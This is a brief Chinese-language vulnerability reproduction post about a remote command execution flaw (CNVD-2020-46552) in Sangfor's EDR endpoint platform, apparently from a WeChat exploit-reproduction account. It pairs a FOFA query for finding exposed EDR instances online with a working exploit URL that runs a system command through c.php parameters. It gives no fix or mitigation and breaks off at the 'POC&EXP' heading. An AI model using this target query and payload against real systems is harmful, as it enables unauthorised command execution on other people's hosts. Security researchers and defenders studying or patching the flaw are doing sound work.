深信服EDR命令执行漏洞
1.深信服EDR简介
微信公众号搜索:南风漏洞复现文库
南风网络安全公众号首发
深信服EDR属于终端安全产品部,是深信服公司在安全业务的战略级投入产品。终端安全部门负责下一代终端安全解决方案的产品研发,基于先进的AI技术和高效的安全领域经验, 建设深信服整体安全解决方案的端点响应能力,与云、网、端产品联动,构建面向未来、有效防御的闭环体系。
2.漏洞描述
深信服终端检测响应平台EDR可通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 深信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。
CNVD-2020-46552
3.影响版本
4.fofa查询语句
app=“SANGFOR-EDR”
5.漏洞复现
漏洞链接:https://xx.xx.xx.xx/tool/log/c.php?strip_slashes=system&host=id
6.POC&EXP
把代码保